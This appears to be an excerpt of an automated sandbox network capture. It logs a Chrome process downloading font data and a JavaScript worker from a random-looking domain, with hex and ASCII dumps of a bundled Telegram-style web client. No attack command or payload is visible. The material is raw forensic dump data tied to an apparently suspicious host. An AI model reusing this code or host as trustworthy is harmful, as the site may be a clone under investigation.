                                  Data Ascii: wOF2+Tp*dd|`l&r6$` t /FRNPx.0t%6_Mq;]lN<s|}s@s_1b`--)Q-BrKhJebffd0jnZ*v.@NLJ:)ih?o"0P
                                  2025-01-12 00:03:44 UTC1369INData Raw: 08 21 7a c0 b1 7d 88 4e ee 70 ec 40 3b 7f 2f 38 06 03 88 ff 10 48 07 ec 45 f4 02 3c 90 80 04 03 05 64 0c f5 26 44 11 0c b0 6e ba 5a c5 aa 58 12 49 37 cb 48 99 2d db 65 2d 69 66 16 14 67 d9 ce c7 f2 d9 2c 99 35 b3 57 8e 9a 0f 3b 2b 05 7b 31 b7 ef c5 c2 56 2f 96 8b 14 d9 a2 59 05 ca 2d 0c 0d af 62 25 cf 1e 53 b6 cb 48 46 a8 72 0d ba 6e 8b 0f 18 35 01 02 09 b1 1f 20 10 aa 30 70 18 31 e1 c0 e7 9c f3 2e b8 e8 1a 01 c2 44 88 12 23 4e 92 14 19 b2 6e 50 a3 4e 93 0e 3d fa 0c 18 33 65 ce 82 15 1b f9 0a 14 29 d6 6f c0 a0 21 c3 46 8c 1a 33 ee a1 47 26 4c 9b 31 6b ce bc 17 d6 6d 78 6d d3 96 6d 3b 76 ed d9 f7 d9 17 5f 7d f3 1d 42 3c 9e c3 90 c4 49 0a 81 0c 2e 2f 70 41 70 04 37 01 6c c1 85 10 5c f8 c2 d8 d5 c1 0f 10 c7 49 39 56 a8 c4 0e 55 82 1a 34 60 00 a3 2b 36 8e b7
                                  Data Ascii: !z}Np@;/8HE<d&DnZXI7H-e-ifg,5W;+{1V/Y-b%SHFrn5 0p1.D#NnPN=3e)o!F3G&L1kmxmm;v_}B<I./pAp7l\I9VU4`+6
                                  2025-01-12 00:03:44 UTC1369INData Raw: e7 4c b7 e7 c1 de 9e 70 f9 bf e5 59 02 84 0e 74 75 b6 03 e9 4b a6 70 d3 da 07 7a 3b 78 80 f1 c1 01 9e 44 b0 04 12 3a 0a 30 94 03 25 6a cd 6d f0 c0 ee 09 20 33 37 81 cd 59 aa 88 48 28 66 db 27 24 f8 83 40 4e 53 b2 60 5a 84 5c 06 d4 04 16 f5 89 69 ac a5 16 8a 57 92 dc e8 09 d6 c0 75 d5 09 5d cc bd aa 9b 61 e9 bd 38 e0 02 b4 0e 27 40 dc 8a 41 83 ba a0 b2 0c ee d0 a5 22 c1 c8 5d 93 c6 e0 ae 16 cd 5a 51 b4 69 d7 a1 33 6f 2d 71 ec e9 ee 16 ca 8f bf 1e bd a8 68 fa dc 83 82 e0 74 12 28 95 f4 32 60 41 bb ac c2 20 cd 5a 9b 51 5e 76 cb 6b ad d5 d0 63 c0 3c b4 0d e8 9d e7 6c 9d 4d 74 54 40 0e c4 df 17 fe 81 bd fb 45 01 6e c8 d5 80 ba 7c a3 e0 c6 0d 0d 5e c4 0c 07 dd da b7 37 06 90 6e 81 49 a9 c0 ba e4 60 e1 81 91 22 55 68 d6 a2 df 98 29 6f 1d f8 8f 08 26 83 7c 2f 63
                                  Data Ascii: LpYtuKpz;xD:0%jm 37YH(f'$@NS`Z\iWu]a8'@A"]ZQi3o-qht(2`A ZQ^vkc<lMtT@En|^7nI`"Uh)o&|/c
                                  2025-01-12 00:03:44 UTC1369INData Raw: 9a 11 d5 02 e0 14 93 74 3c c0 fa 38 06 27 ff e8 b2 cf 8d 23 56 66 64 e8 47 70 9b dc 0e 43 2f 72 24 95 b9 f6 df aa a1 06 f7 47 d5 31 a6 93 aa 96 04 6d b1 0f 3b 21 46 42 81 42 15 fb 51 c0 8a 2d 05 ee 13 9e 62 86 14 33 ed c9 54 64 7c bd a0 f5 af d8 b9 b0 70 a4 22 58 ce a9 3c f7 fc 74 a1 b2 ef da ec 01 8b 13 83 8e ed 15 f5 31 98 7d 6b 4c 47 6e d3 67 e6 8f 9a 1a dc 3f 39 ab 98 0b ca 89 5e d5 6b ad b2 79 e8 36 0b 13 6a 57 a0 77 80 6e be 84 d9 78 db 4f d5 9e ca 74 2f de 3b 85 c6 0e 61 41 74 33 78 a7 74 db 4e 9f a9 07 d3 e3 2e d3 a6 f6 2e 09 b7 45 4a 9e c4 56 b8 b8 a6 a6 9c d1 df 5c be a4 bc bd 43 bb db 94 ee 72 b6 bf b2 dc a7 a0 e4 f5 db e1 0e 64 cf e2 20 54 30 84 a2 fc 31 a6 a8 22 44 96 ea 84 52 de a1 82 59 1d 68 8b 6f ff 2c 05 ee e4 96 f9 28 aa a2 1c 7b 2e 42
                                  Data Ascii: t<8'#VfdGpC/r$G1m;!FBBQ-b3Td|p"X<t1}kLGng?9^ky6jWwnxOt/;aAt3xtN..EJV\Crd T01"DRYho,({.B
                                  2025-01-12 00:03:44 UTC1369INData Raw: 43 3d dc 80 dd 28 f8 a4 93 37 ec a5 32 27 94 f3 c2 9f 42 bc 4e 21 f9 ea f2 0e 92 e8 95 ec 50 29 27 f5 ca c9 a2 e0 95 8c 1d 9e a4 bc 5b d8 61 3d e9 f7 9a a9 19 a5 bc f8 f6 2a c5 83 68 74 90 65 54 44 81 d0 bc dc d0 74 65 cd 83 99 5a 8e 57 b9 4b 75 5c b4 9d a7 bd 69 f1 77 88 41 11 a1 5e b7 e2 82 05 ec 1b 03 75 4b dd 1a 26 9e 76 13 fa 73 fa a9 6c b3 6f c7 a8 29 99 b9 a4 d8 dc 08 c0 e5 14 c4 d6 36 c4 c6 d7 34 26 aa c4 d5 d6 46 c7 34 d4 a6 24 e1 b4 4d 1c d5 55 8c ed 8c d4 b4 8d 9c 72 8c 9c f4 cf 74 5c 8b ad ad c7 d5 d5 a5 a8 98 10 23 a9 63 75 7e 00 a9 1a d9 1b a9 eb 18 3b a8 a9 98 da 1b fe f8 e4 22 7f d9 9f e8 22 0f 8e 24 57 ff d6 1a 7f db 00 79 b2 4a ed 70 5f 7d de f0 dd 78 53 d3 1c 2f 3d 37 6d c5 18 c5 e8 f2 ba ff 65 dd d4 8f 15 5b a2 9a fc 98 92 f3 02 b2 be
                                  Data Ascii: C=(72'BN!P)'[a=*hteTDteZWKu\iwA^uK&vslo)64&F4$MUrt\#cu~;""$WyJp_}xS/=7me[
                                  2025-01-12 00:03:44 UTC1369INData Raw: cc 2b f3 f6 f6 83 2a 2f ea 95 2f ce ce fd a0 9b d5 b0 48 96 a5 ab a3 34 d3 d7 67 89 23 4f 5d 67 33 e5 19 1a 9b 5b 19 ea c9 72 0b 0f 10 f4 14 67 5f f7 34 27 ea ab fb ef d9 53 54 da 63 16 d4 1f 70 91 90 c4 fc d8 38 7a c0 f2 f9 d1 3c 7e f3 bb 71 89 59 51 75 46 52 4c 75 71 3a ca 11 74 09 0d 73 f1 02 c1 46 e8 c7 31 c1 42 9f 55 d8 75 f5 ef 40 61 68 28 4b 2c f4 03 f2 84 eb 41 17 94 7e 4d 9f f6 17 d3 1f 68 1a 6b d9 f7 43 66 e3 1b 7e 75 31 31 eb 51 8c a0 91 2b d3 64 e6 d6 39 72 7d 76 78 42 05 39 1f f8 c1 28 f1 db cd b5 c9 82 66 c2 da 52 de b6 5f d4 e3 90 c1 b8 ba bc c2 f4 b2 70 6f b3 bc 50 37 a7 27 a1 f6 d5 de 6d 1c f3 ef f2 d0 c4 d4 f1 db 83 71 43 05 d5 05 95 61 8b b9 fe a0 16 40 98 07 2c a1 1f b0 84 b9 b2 5b a0 7e 87 b2 02 4f 01 fb 8a 95 e7 e0 38 82 ac af 3d 78
                                  Data Ascii: +*//H4g#O]g3[rg_4'STcp8z<~qYQuFRLuq:tsF1BUu@ah(K,A~MhkCf~u11Q+d9r}vxB9(fR_poP7'mqCa@,[~O8=x
                                  2025-01-12 00:03:44 UTC1369INData Raw: e6 39 87 98 72 35 c3 ef a3 a1 16 e3 98 1d 4c 67 da 8a 8d 18 7d 48 3e ba 45 dd 6e e7 19 3f be 74 66 fe d1 09 0a f7 06 75 35 97 ab 7f 0e 9b 3b 11 95 a2 57 db 80 27 dd ab 22 19 f3 65 28 c1 97 6a 05 0b c6 20 36 78 ba a5 3b a5 15 78 f4 f8 97 bd 87 0f 96 e7 da fa dd 23 c3 bc 5d a3 0b 23 f0 e8 1b a5 a0 f4 c1 a7 2c 76 66 aa 2c 3a 3e 21 9a 94 9c ea 5c 3c 31 e9 5d 95 95 17 9d 90 95 5b 1a 34 3c 52 16 9c 93 1f 9b 98 57 e8 59 f5 78 c4 a9 2c 9d 1c 9b 20 89 0a 0b 23 ce 0d 87 6c 0c 87 fa cc 86 d1 3c 23 c1 3e be c3 41 0b f7 03 78 3a 8e 0a e7 2d 78 4d 61 23 94 ee 28 85 2b 29 0c 2a c8 86 cb de 91 8d a0 93 55 fc 39 64 31 1f a6 1d 7e 48 fb 46 03 95 cc d6 fb 54 43 25 01 95 04 c7 7a f4 d8 a6 cf c3 eb ca e2 c9 3e 4f a9 48 4c 47 5e 49 e2 1d 7f 5b b3 34 97 69 99 ae 6b fd 5e 96 45
                                  Data Ascii: 9r5Lg}H>En?tfu5;W'"e(j 6x;x#]#,vf,:>!\<1][4<RWYx, #l<#>Ax:-xMa#(+)*U9d1~HFTC%z>OHLG^I[4ik^E
                                  2025-01-12 00:03:44 UTC1369INData Raw: 85 37 70 dc fc d9 f0 4b ae 34 08 b3 ac 22 77 dc d7 89 39 dd 83 c5 a3 65 70 13 99 94 98 1b da 06 5b fe 8a e0 bf 2f 13 d3 93 1e fa 4b 3b c8 39 0d 13 7d a6 b6 fe ee f8 4f e2 1a aa 47 48 f7 82 dc d5 22 12 63 bf 26 3c f1 96 75 90 b1 1f f3 21 2d d1 5d fb d7 8b ef 29 7f 96 92 54 be 38 d9 5d f1 3c 39 a1 72 41 61 7a d1 21 b7 ea 50 12 cb b1 88 c4 5c 10 70 dc 67 28 cc 6d c8 69 28 64 fa ca ea 03 bc 01 51 26 61 fe 16 96 a1 01 cd a1 21 bd a1 21 ea 46 d7 14 14 05 05 14 e5 ed 15 94 04 85 e4 95 41 f8 cd 92 47 68 bc e5 85 0e 5b 99 e6 13 17 ca 04 c3 70 ee c1 29 56 67 fc 6c 24 78 4e 5f 12 57 bc 02 6c 6f 39 5c 55 2c 23 51 59 89 bd fe b7 6c c7 81 3e 87 cb 45 c5 32 1a 45 ce e8 89 01 07 db 31 48 3d e6 a2 6a 1e 89 ca 0c a4 3a 3a d9 3f 82 d4 cb 2e 2a e6 89 a8 02 2a b5 c6 c3 7e 76
                                  Data Ascii: 7pK4"w9ep[/K;9}OGH"c&<u!-])T8]<9rAaz!P\pg(mi(dQ&a!!FAGh[p)Vgl$xN_Wlo9\U,#QYl>E2E1H=j::?.**~v
                                  2025-01-12 00:03:44 UTC965INData Raw: bc 7d 32 05 0d 94 f0 bc 8d 68 00 75 ed be 02 54 d2 fd 5f 03 e9 58 77 17 0a c8 9b 41 8f 2d ac 8d 85 e2 ce 7d ba fc 2d d3 86 d0 f1 0a 8c dd 87 9e 4e 1c 9a ce f6 c5 fd 95 ba 15 a6 f1 13 5b e4 7e 63 05 f5 de a2 78 9e 80 b3 dd 03 58 ad ed ca d1 fc 8a 2c 58 0e 94 fe 76 ab 36 2b c1 e7 fa 60 3d 75 3d 31 06 d2 3e ed 3f 7c 04 f2 32 d0 ff bf 88 05 71 ef e5 af d9 46 a4 82 f2 61 db 65 81 13 30 22 3d 80 56 a9 be 6d 54 a2 7e 96 ea 83 0d 93 6b a0 f1 47 71 c0 76 4d e7 ca e3 6f 7c 4a 25 e4 33 30 17 ad 5c 49 e5 f9 4f 40 9e 63 dc db 8a fb 05 36 ac d2 bf e3 8f 0e 01 c0 63 3f fb 55 00 5e 5f fa bf fd 3a fe 77 61 a8 c0 10 3f 60 28 14 40 02 fd 03 07 4c 00 43 d7 cb 68 ff d4 a9 b9 73 b5 9e bf 4a 2a 47 85 f4 ef cb 0b 9a 47 43 45 26 4b ac 7b 82 6a 24 af b6 c4 b5 fe e4 94 9c 38 e7 7b
                                  Data Ascii: }2huT_XwA-}-N[~cxX,Xv6+`=u=1>?|2qFae0"=VmT~kGqvMo|J%30\IO@c6c?U^_:wa?`(@LChsJ*GGCE&K{j$8{


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  13192.168.2.649770172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:43 UTC551OUTGET /3559.80b270ba0e217557b392.js HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: same-origin
                                  Sec-Fetch-Dest: worker
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:44 UTC926INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:44 GMT
                                  Content-Type: application/javascript
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  Vary: Accept-Encoding
                                  ETag: W/"674840af-92ae6"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 6951
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tid%2BRE2RnNaIWbm8Bh3kHhf8SgE4KPKVJ7RPhOTdsw6l24Nt2grW1OAhyGRZAi2UU%2FnlBXmqiBmQPrZz11qE0p8HOGoFox15c722gQdmLEHTZXKcLw%2BYVBTrR3GE3cn7%2FtrXAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2983e637d16-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1775&rtt_var=683&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1129&delivery_rate=1582655&cwnd=217&unsent_bytes=0&cid=eca9751324680c63&ts=162&x=0"
                                  2025-01-12 00:03:44 UTC443INData Raw: 37 63 64 38 0d 0a 28 28 29 3d 3e 7b 76 61 72 20 65 2c 74 2c 73 3d 7b 36 34 35 33 3a 28 65 2c 74 2c 73 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 73 2e 64 28 74 2c 7b 41 3a 28 29 3d 3e 6e 7d 29 3b 63 6c 61 73 73 20 6e 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 74 68 69 73 2e 69 73 55 70 6c 6f 61 64 3d 65 7d 7d 7d 2c 33 35 35 39 3a 28 65 2c 74 2c 73 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 7b 7d 3b 73 2e 72 28 6e 29 2c 73 2e 64 28 6e 2c 7b 54 79 70 65 3a 28 29 3d 3e 5f 6f 2c 63 6c 65 61 72 3a 28 29 3d 3e 53 6f 2c 66 65 74 63 68 3a 28 29 3d 3e 62 6f 2c 69 73 43 61 63 68 65 41 70 69 53 75 70 70 6f 72 74 65 64 3a 28 29 3d 3e 79 6f 2c 72 65 6d 6f 76 65 3a 28 29 3d 3e 76 6f 2c 73 61 76 65 3a 28 29 3d 3e 77 6f 7d 29 3b 76
                                  Data Ascii: 7cd8(()=>{var e,t,s={6453:(e,t,s)=>{"use strict";s.d(t,{A:()=>n});class n{constructor(e){this.isUpload=e}}},3559:(e,t,s)=>{"use strict";var n={};s.r(n),s.d(n,{Type:()=>_o,clear:()=>So,fetch:()=>bo,isCacheApiSupported:()=>yo,remove:()=>vo,save:()=>wo});v
                                  2025-01-12 00:03:44 UTC1369INData Raw: 2c 61 64 64 43 68 61 74 4d 65 6d 62 65 72 73 3a 28 29 3d 3e 77 72 2c 61 6c 6c 6f 77 42 6f 74 53 65 6e 64 4d 65 73 73 61 67 65 73 3a 28 29 3d 3e 74 70 2c 61 6e 73 77 65 72 43 61 6c 6c 62 61 63 6b 42 75 74 74 6f 6e 3a 28 29 3d 3e 44 6c 2c 61 70 70 6c 79 42 6f 6f 73 74 3a 28 29 3d 3e 4c 66 2c 61 70 70 6c 79 47 69 66 74 43 6f 64 65 3a 28 29 3d 3e 24 66 2c 62 6c 6f 63 6b 55 73 65 72 3a 28 29 3d 3e 71 75 2c 62 72 6f 61 64 63 61 73 74 4c 6f 63 61 6c 44 62 55 70 64 61 74 65 46 75 6c 6c 3a 28 29 3d 3e 44 65 2c 63 68 61 6e 67 65 53 65 73 73 69 6f 6e 53 65 74 74 69 6e 67 73 3a 28 29 3d 3e 78 64 2c 63 68 61 6e 67 65 53 65 73 73 69 6f 6e 54 74 6c 3a 28 29 3d 3e 56 64 2c 63 68 61 6e 67 65 53 74 61 72 73 53 75 62 73 63 72 69 70 74 69 6f 6e 3a 28 29 3d 3e 72 67 2c 63 68
                                  Data Ascii: ,addChatMembers:()=>wr,allowBotSendMessages:()=>tp,answerCallbackButton:()=>Dl,applyBoost:()=>Lf,applyGiftCode:()=>$f,blockUser:()=>qu,broadcastLocalDbUpdateFull:()=>De,changeSessionSettings:()=>xd,changeSessionTtl:()=>Vd,changeStarsSubscription:()=>rg,ch
                                  2025-01-12 00:03:44 UTC1369INData Raw: 69 74 45 78 70 6f 72 74 65 64 43 68 61 74 49 6e 76 69 74 65 3a 28 29 3d 3e 5f 75 2c 65 64 69 74 47 72 6f 75 70 43 61 6c 6c 50 61 72 74 69 63 69 70 61 6e 74 3a 28 29 3d 3e 64 70 2c 65 64 69 74 47 72 6f 75 70 43 61 6c 6c 54 69 74 6c 65 3a 28 29 3d 3e 75 70 2c 65 64 69 74 4d 65 73 73 61 67 65 3a 28 29 3d 3e 73 63 2c 65 64 69 74 53 74 6f 72 79 50 72 69 76 61 63 79 3a 28 29 3d 3e 6b 66 2c 65 64 69 74 54 6f 70 69 63 3a 28 29 3d 3e 78 72 2c 65 6e 63 6f 64 65 50 68 6f 6e 65 43 61 6c 6c 44 61 74 61 3a 28 29 3d 3e 75 66 2c 65 78 70 6f 72 74 43 68 61 74 49 6e 76 69 74 65 3a 28 29 3d 3e 62 75 2c 65 78 70 6f 72 74 47 72 6f 75 70 43 61 6c 6c 49 6e 76 69 74 65 3a 28 29 3d 3e 6c 70 2c 65 78 70 6f 72 74 4d 65 73 73 61 67 65 4c 69 6e 6b 3a 28 29 3d 3e 51 63 2c 66 61 76 65
                                  Data Ascii: itExportedChatInvite:()=>_u,editGroupCallParticipant:()=>dp,editGroupCallTitle:()=>up,editMessage:()=>sc,editStoryPrivacy:()=>kf,editTopic:()=>xr,encodePhoneCallData:()=>uf,exportChatInvite:()=>bu,exportGroupCallInvite:()=>lp,exportMessageLink:()=>Qc,fave
                                  2025-01-12 00:03:44 UTC1369INData Raw: 73 3a 28 29 3d 3e 4c 64 2c 66 65 74 63 68 46 75 6c 6c 43 68 61 74 3a 28 29 3d 3e 44 6f 2c 66 65 74 63 68 46 75 6c 6c 55 73 65 72 3a 28 29 3d 3e 58 63 2c 66 65 74 63 68 47 65 6e 65 72 69 63 45 6d 6f 6a 69 45 66 66 65 63 74 73 3a 28 29 3d 3e 59 64 2c 66 65 74 63 68 47 69 76 65 61 77 61 79 49 6e 66 6f 3a 28 29 3d 3e 7a 66 2c 66 65 74 63 68 47 6c 6f 62 61 6c 50 72 69 76 61 63 79 53 65 74 74 69 6e 67 73 3a 28 29 3d 3e 6d 6c 2c 66 65 74 63 68 47 72 6f 75 70 43 61 6c 6c 50 61 72 74 69 63 69 70 61 6e 74 73 3a 28 29 3d 3e 70 70 2c 66 65 74 63 68 47 72 6f 75 70 53 74 61 74 69 73 74 69 63 73 3a 28 29 3d 3e 6a 70 2c 66 65 74 63 68 47 72 6f 75 70 73 46 6f 72 44 69 73 63 75 73 73 69 6f 6e 3a 28 29 3d 3e 6d 72 2c 66 65 74 63 68 49 6e 6c 69 6e 65 42 6f 74 3a 28 29 3d 3e
                                  Data Ascii: s:()=>Ld,fetchFullChat:()=>Do,fetchFullUser:()=>Xc,fetchGenericEmojiEffects:()=>Yd,fetchGiveawayInfo:()=>zf,fetchGlobalPrivacySettings:()=>ml,fetchGroupCallParticipants:()=>pp,fetchGroupStatistics:()=>jp,fetchGroupsForDiscussion:()=>mr,fetchInlineBot:()=>
                                  2025-01-12 00:03:44 UTC1369INData Raw: 65 65 6e 42 79 3a 28 29 3d 3e 44 63 2c 66 65 74 63 68 53 65 6e 64 41 73 3a 28 29 3d 3e 55 63 2c 66 65 74 63 68 53 70 6f 6e 73 6f 72 65 64 4d 65 73 73 61 67 65 73 3a 28 29 3d 3e 56 63 2c 66 65 74 63 68 53 74 61 72 47 69 66 74 73 3a 28 29 3d 3e 59 66 2c 66 65 74 63 68 53 74 61 72 73 47 69 76 65 61 77 61 79 4f 70 74 69 6f 6e 73 3a 28 29 3d 3e 58 66 2c 66 65 74 63 68 53 74 61 72 73 53 74 61 74 75 73 3a 28 29 3d 3e 6e 67 2c 66 65 74 63 68 53 74 61 72 73 53 75 62 73 63 72 69 70 74 69 6f 6e 73 3a 28 29 3d 3e 6f 67 2c 66 65 74 63 68 53 74 61 72 73 54 6f 70 75 70 4f 70 74 69 6f 6e 73 3a 28 29 3d 3e 64 67 2c 66 65 74 63 68 53 74 61 72 73 54 72 61 6e 73 61 63 74 69 6f 6e 42 79 49 64 3a 28 29 3d 3e 69 67 2c 66 65 74 63 68 53 74 61 72 73 54 72 61 6e 73 61 63 74 69 6f
                                  Data Ascii: eenBy:()=>Dc,fetchSendAs:()=>Uc,fetchSponsoredMessages:()=>Vc,fetchStarGifts:()=>Yf,fetchStarsGiveawayOptions:()=>Xf,fetchStarsStatus:()=>ng,fetchStarsSubscriptions:()=>og,fetchStarsTopupOptions:()=>dg,fetchStarsTransactionById:()=>ig,fetchStarsTransactio
                                  2025-01-12 00:03:44 UTC1369INData Raw: 28 29 3d 3e 50 75 2c 69 6d 70 6f 72 74 43 68 61 74 49 6e 76 69 74 65 3a 28 29 3d 3e 50 72 2c 69 6d 70 6f 72 74 43 6f 6e 74 61 63 74 3a 28 29 3d 3e 6e 64 2c 69 6e 73 74 61 6c 6c 53 74 69 63 6b 65 72 53 65 74 3a 28 29 3d 3e 69 75 2c 69 6e 76 6f 6b 65 57 65 62 56 69 65 77 43 75 73 74 6f 6d 4d 65 74 68 6f 64 3a 28 29 3d 3e 73 70 2c 6a 6f 69 6e 43 68 61 6e 6e 65 6c 3a 28 29 3d 3e 4f 6f 2c 6a 6f 69 6e 43 68 61 74 6c 69 73 74 49 6e 76 69 74 65 3a 28 29 3d 3e 4e 72 2c 6a 6f 69 6e 47 72 6f 75 70 43 61 6c 6c 3a 28 29 3d 3e 67 70 2c 6a 6f 69 6e 47 72 6f 75 70 43 61 6c 6c 50 72 65 73 65 6e 74 61 74 69 6f 6e 3a 28 29 3d 3e 6d 70 2c 6c 61 75 6e 63 68 50 72 65 70 61 69 64 47 69 76 65 61 77 61 79 3a 28 29 3d 3e 73 67 2c 6c 65 61 76 65 43 68 61 6e 6e 65 6c 3a 28 29 3d 3e
                                  Data Ascii: ()=>Pu,importChatInvite:()=>Pr,importContact:()=>nd,installStickerSet:()=>iu,invokeWebViewCustomMethod:()=>sp,joinChannel:()=>Oo,joinChatlistInvite:()=>Nr,joinGroupCall:()=>gp,joinGroupCallPresentation:()=>mp,launchPrepaidGiveaway:()=>sg,leaveChannel:()=>
                                  2025-01-12 00:03:44 UTC1369INData Raw: 28 29 3d 3e 71 6c 2c 72 65 73 63 68 65 64 75 6c 65 4d 65 73 73 61 67 65 3a 28 29 3d 3e 6e 63 2c 72 65 73 6f 6c 76 65 42 75 73 69 6e 65 73 73 43 68 61 74 4c 69 6e 6b 3a 28 29 3d 3e 4e 64 2c 72 65 73 74 61 72 74 41 75 74 68 3a 28 29 3d 3e 66 6f 2c 72 65 73 74 61 72 74 41 75 74 68 57 69 74 68 51 72 3a 28 29 3d 3e 67 6f 2c 73 61 76 65 43 6c 6f 73 65 46 72 69 65 6e 64 73 3a 28 29 3d 3e 64 64 2c 73 61 76 65 44 65 66 61 75 6c 74 53 65 6e 64 41 73 3a 28 29 3d 3e 78 63 2c 73 61 76 65 44 72 61 66 74 3a 28 29 3d 3e 46 6f 2c 73 61 76 65 47 69 66 3a 28 29 3d 3e 61 75 2c 73 61 76 65 53 74 61 72 47 69 66 74 3a 28 29 3d 3e 65 67 2c 73 65 61 72 63 68 43 68 61 74 73 3a 28 29 3d 3e 78 6f 2c 73 65 61 72 63 68 47 69 66 73 3a 28 29 3d 3e 63 75 2c 73 65 61 72 63 68 48 61 73 68
                                  Data Ascii: ()=>ql,rescheduleMessage:()=>nc,resolveBusinessChatLink:()=>Nd,restartAuth:()=>fo,restartAuthWithQr:()=>go,saveCloseFriends:()=>dd,saveDefaultSendAs:()=>xc,saveDraft:()=>Fo,saveGif:()=>au,saveStarGift:()=>eg,searchChats:()=>xo,searchGifs:()=>cu,searchHash
                                  2025-01-12 00:03:44 UTC1369INData Raw: 3d 3e 4d 72 2c 74 6f 67 67 6c 65 4a 6f 69 6e 52 65 71 75 65 73 74 3a 28 29 3d 3e 49 72 2c 74 6f 67 67 6c 65 4a 6f 69 6e 54 6f 53 65 6e 64 3a 28 29 3d 3e 53 72 2c 74 6f 67 67 6c 65 50 61 72 74 69 63 69 70 61 6e 74 73 48 69 64 64 65 6e 3a 28 29 3d 3e 52 72 2c 74 6f 67 67 6c 65 50 65 65 72 54 72 61 6e 73 6c 61 74 69 6f 6e 73 3a 28 29 3d 3e 6a 72 2c 74 6f 67 67 6c 65 50 69 6e 6e 65 64 54 6f 70 69 63 3a 28 29 3d 3e 55 72 2c 74 6f 67 67 6c 65 50 72 65 48 69 73 74 6f 72 79 48 69 64 64 65 6e 3a 28 29 3d 3e 72 72 2c 74 6f 67 67 6c 65 53 61 76 65 64 44 69 61 6c 6f 67 50 69 6e 6e 65 64 3a 28 29 3d 3e 51 6f 2c 74 6f 67 67 6c 65 53 69 67 6e 61 74 75 72 65 73 3a 28 29 3d 3e 66 72 2c 74 6f 67 67 6c 65 53 70 6f 6e 73 6f 72 65 64 4d 65 73 73 61 67 65 73 3a 28 29 3d 3e 46
                                  Data Ascii: =>Mr,toggleJoinRequest:()=>Ir,toggleJoinToSend:()=>Sr,toggleParticipantsHidden:()=>Rr,togglePeerTranslations:()=>jr,togglePinnedTopic:()=>Ur,togglePreHistoryHidden:()=>rr,toggleSavedDialogPinned:()=>Qo,toggleSignatures:()=>fr,toggleSponsoredMessages:()=>F
                                  2025-01-12 00:03:44 UTC1369INData Raw: 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 2c 32 30 29 2c 6d 3d 32 30 30 2c 79 3d 35 30 2c 5f 3d 31 30 30 2c 62 3d 31 30 30 2c 77 3d 31 30 30 2c 76 3d 31 30 30 2c 53 3d 35 30 2c 49 3d 31 30 30 2c 41 3d 35 30 2c 50 3d 31 30 30 2c 43 3d 31 30 30 2c 4d 3d 31 30 30 2c 52 3d 32 30 2c 6b 3d 33 65 35 2c 54 3d 22 58 54 52 22 2c 45 3d 32 2a 2a 33 31 2d 31 2c 42 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 34 35 30 29 2c 44 3d 6e 65 77 20 53 65 74 28 5b 22 6e 65 77 4d 65 73 73 61 67 65 22 2c 22 6e 65 77 53 63 68 65 64 75 6c 65 64 4d 65 73 73 61 67 65 22 2c 22 64 65 6c 65 74 65 4d 65 73 73 61 67 65 73 22 2c 22 64 65 6c 65 74 65 53 63 68 65 64 75 6c 65 64 4d 65 73 73 61 67 65 73 22 2c 22 64 65 6c 65 74 65 48 69 73 74 6f 72 79 22 5d 29 2c 55 3d 32
                                  Data Ascii: ndow&&window.innerHeight,20),m=200,y=50,_=100,b=100,w=100,v=100,S=50,I=100,A=50,P=100,C=100,M=100,R=20,k=3e5,T="XTR",E=2**31-1,B=Math.round(450),D=new Set(["newMessage","newScheduledMessage","deleteMessages","deleteScheduledMessages","deleteHistory"]),U=2
                                  2025-01-12 00:03:44 UTC1369INData Raw: 20 73 2c 6e 2c 61 2c 69 3d 21 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 29 7c 7c 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 21 30 3b 66 6f 72 28 76 61 72 20 6f 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 72 3d 6e 65 77 20 41 72 72 61 79 28 6f 29 2c 63 3d 30 3b 63 3c 6f 3b 63 2b 2b 29 72 5b 63 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 63 5d 3b 61 3d 72 2c 73 7c 7c 28 69 26 26 28 6e 3d 21 31 2c 65 28 2e 2e 2e 61 29 29 2c 73 3d 73 65 6c 66 2e 73 65 74 49 6e 74 65 72 76 61 6c 28 28 28 29 3d 3e 7b 69 66 28 21 6e 29 72 65 74 75 72 6e 20 73 65 6c 66 2e 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 73 29 2c 76 6f 69 64 28 73
